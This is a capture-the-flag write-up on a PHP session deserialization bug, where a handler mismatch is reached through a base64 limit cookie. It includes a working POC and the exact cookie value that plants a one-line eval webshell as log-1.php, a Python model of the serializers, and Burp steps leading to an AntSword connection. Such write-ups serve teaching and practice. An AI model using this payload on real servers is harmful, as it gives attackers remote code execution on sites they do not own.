A dirsearch scan turns up www.zip, which contains the site's source.
Download it. The two files that matter:
index.php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 16:28:37
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-06 19:21:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
session_start();
// Lock out after more than 5 failed logins
if(isset($_SESSION['limit'])){
    // Note the typo: $_SESSION['limti'] is never set, so null > 5 is always false and
    // the cookie value is copied into the session on every visit after the first.
    $_SESSION['limti']>5?die("Too many failed logins"):$_SESSION['limit']=base64_decode($_COOKIE['limit']);
    // Only rewrites the $_COOKIE superglobal; no Set-Cookie header goes back to the browser.
    $_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit']) +1);
}else{
    // First visit: the counter starts at 1 both in the session and in the browser cookie (base64 "1" = MQ==)
    setcookie("limit",base64_encode('1'));
    $_SESSION['limit']= 1;
}
?>
check.php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-03 16:59:10
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-06 19:15:38
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
error_reporting(0);
require_once 'inc/inc.php';   // provides $db; inc/inc.php is not reproduced in this writeup
$GET = array("u"=>$_GET['u'],"pass"=>$_GET['pass']);
if($GET){                     // a non-empty array is always truthy, so this branch always runs
    $data= $db->get('admin',
        [ 'id',
          'UserName0'
        ],[
        "AND"=>[
            "UserName0[=]"=>$GET['u'],
            "PassWord1[=]"=>$GET['pass'] // the password is 128 chars of mixed-case letters, digits and symbols, to defeat brute force
        ]
    ]);
    if($data['id']){
        // Successful login: reset the failure counter
        $_SESSION['limit']= 0;
        echo json_encode(array("success","msg"=>"Welcome, ".$data['UserName0']));
    }else{
        // Failed login: add 1 to the counter (again only the $_COOKIE superglobal changes; no cookie is sent back)
        $_COOKIE['limit'] = base64_encode(base64_decode($_COOKIE['limit'])+1);
        echo json_encode(array("error","msg"=>"Login failed"));
    }
}
This challenge had me falling into one pit after another.
What it exploits is PHP session deserialization (background reading: 'PHP session反序列化漏洞原理解析', "How the PHP session deserialization vulnerability works"). In short: a session written under session.serialize_handler=php_serialize is stored as serialize($_SESSION) in one piece, but a reader configured with the older php handler splits the file into name|value records at the first '|' and unserializes whatever follows it. So a serialized object with a leading '|' smuggled into any session value becomes a live object on the next session_start() that uses the php handler. Here index.php copies the limit cookie straight into $_SESSION['limit'], and check.php pulls in inc/inc.php (not shown in the writeup), which is presumably where the handler differs.
Once the mechanism is clear, build the POC:
<?php
// Same property names as the User class in inc/inc.php (not reproduced in the writeup)
class User{
    public $username;
    public $password;
    public $status;
}
$a = new User();
$a -> username = "1.php";                        // ends up as the file name: log-1.php
$a -> password = '<?=eval($_POST[passwd]);?>';   // ends up as the file content: a one-line webshell
// The leading '|' is what the php serialize handler treats as the name/value separator
// when it re-reads a session file that the php_serialize handler wrote.
echo urlencode(base64_encode("|".serialize($a)));
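To see exactly what the leading '|' buys you, here is an added Python model of the session layer (my code, not the challenge's or the writeup's). It re-implements just enough of PHP's serialize()/unserialize() to handle the types the POC uses, mimics both session.serialize_handler values (php_serialize on write, php on read, the direction the '|' prefix implies), and follows index.php above across two requests. Assumptions: the User class and the handler switch live in inc/inc.php, which the writeup does not reproduce, so nothing here models what the object does once it exists (the writeup only shows that log-1.php appears afterwards).

```python
"""Session-handler mismatch behind the 'limit' cookie, modelled offline.

Added example, not the challenge's code: php_serialize()/php_unserialize()
cover only the PHP types the POC uses, write_session()/read_session_php()
mimic the two session.serialize_handler values, index_php() follows the
source above. The User class lives in inc/inc.php, which the writeup omits.
"""
import base64
from urllib.parse import quote, unquote

# A PHP object is modelled as (class_name, {property: value}); None is null.
USER_PAYLOAD = ("User", {"username": "1.php",
                         "password": "<?=eval($_POST[passwd]);?>",
                         "status": None})


def php_serialize(value):
    """serialize() for null, int, str, assoc array (dict) and object (tuple)."""
    if value is None:
        return "N;"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        return f's:{len(value.encode())}:"{value}";'
    if isinstance(value, dict):
        body = "".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    cls, props = value
    body = "".join(php_serialize(k) + php_serialize(v) for k, v in props.items())
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'


def php_unserialize(data, pos=0):
    """Parse one value at data[pos]; return (value, position just after it)."""
    tag = data[pos]
    if tag == "N":
        return None, pos + 2
    if tag == "i":
        end = data.index(";", pos)
        return int(data[pos + 2:end]), end + 1
    if tag == "s":                                      # s:len:"bytes";
        colon = data.index(":", pos + 2)
        n, start = int(data[pos + 2:colon]), colon + 2
        return data[start:start + n], start + n + 2
    if tag == "O":                                      # O:len:"Class":count:{...}
        colon = data.index(":", pos + 2)
        n = int(data[pos + 2:colon])
        cls, pos = data[colon + 2:colon + 2 + n], colon + n + 4
    else:                                               # a:count:{...}
        cls, pos = None, pos + 2
    count_end = data.index(":", pos)
    count, pos = int(data[pos:count_end]), count_end + 2
    items = {}
    for _ in range(count):
        key, pos = php_unserialize(data, pos)
        items[key], pos = php_unserialize(data, pos)
    return (items if cls is None else (cls, items)), pos + 1


def index_php(session, cookies):
    """One request to index.php: returns (session, Set-Cookie or None).
    unquote() stands in for PHP decoding the cookie value into $_COOKIE."""
    if "limit" in session:
        if session.get("limti", 0) > 5:      # typo in the challenge: never trips
            raise SystemExit("too many failed logins")
        session["limit"] = base64.b64decode(unquote(cookies["limit"])).decode()
        return session, None                 # $_COOKIE['limit'] = ... sets no cookie
    session["limit"] = 1
    return session, ("limit", base64.b64encode(b"1").decode())


def write_session(session):
    """session.serialize_handler = php_serialize: serialize() of all of $_SESSION."""
    return php_serialize(session)


def read_session_php(raw):
    """session.serialize_handler = php: name|value records, name up to the first '|'."""
    session, pos = {}, 0
    while (bar := raw.find("|", pos)) >= 0:
        name = raw[pos:bar]
        session[name], pos = php_unserialize(raw, bar + 1)
    return session


def build_limit_cookie(payload=USER_PAYLOAD):
    """What the PHP POC echoes: urlencode(base64_encode("|" . serialize($a)))."""
    return quote(base64.b64encode(("|" + php_serialize(payload)).encode()).decode(), safe="")


def attack(limit_cookie):
    """Two visits to index.php, then the session read the way check.php's include does."""
    session, _ = index_php({}, {})                              # 1st visit: limit = 1
    session, _ = index_php(session, {"limit": limit_cookie})    # 2nd visit: our string lands
    stored = write_session(session)                             # written with php_serialize
    return stored, read_session_php(stored)                     # read back with php


if __name__ == "__main__":
    cookie = build_limit_cookie()
    stored, restored = attack(cookie)
    print("limit cookie:", cookie)
    print("session file:", stored)
    for name, value in restored.items():
        print("session key %r -> %r" % (name, value))
```

Run it and the last line shows the point: the restored session has a single key, the junk prefix a:1:{s:5:"limit";s:107:", and its value is a User object with username 1.php and the webshell as password. Reading the same file with php_unserialize() (what a php_serialize reader would do) gives back only a harmless string, which is why the exploit needs the two sides of the application to disagree.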
From here on it is all pitfalls.
First, don't send the cookie with HackBar: it replaces the whole Cookie header, so the other cookies are lost (here that means PHPSESSID, unless you can also supply PHPSESSID by hand). Edit the existing Cookie header in Burp instead and change only the limit value.
Second, the cookie does nothing when you click login; it has to be on the request to index.php. Look at the code: on the first visit index.php only sets $_SESSION['limit']=1 and sends back limit=MQ== (base64 of "1"); only on a later visit, when the session already has 'limit', does it copy base64_decode($_COOKIE['limit']) into the session. So the payload cookie goes on the second request to index.php, with the same PHPSESSID.
Finally, refresh a few times: right after you have run something, the backend session may not have been restored to its original state before it gets manipulated again, which leads to some very strange behaviour.
(I was nearly in tears over this.)
With all that said, here is the process.
First, visit the home page (with or without /index.php in the path).
Then refresh once, intercept that request in Burp Suite, edit the Cookie header, and set limit to
limit=fE86NDoiVXNlciI6Mzp7czo4OiJ1c2VybmFtZSI7czo1OiIxLnBocCI7czo4OiJwYXNzd29yZCI7czoyNjoiPD89ZXZhbCgkX1BPU1RbcGFzc3dkXSk7Pz4iO3M6Njoic3RhdHVzIjtOO30%3D
Once that request has gone through (remember, send it exactly once), either click login or simply request check.php so that its session_start() runs once; then visit log-1.php.
If it returns some content, it worked, and you can connect with AntSword. If not, be sure to refresh a few more times before sending the cookie again.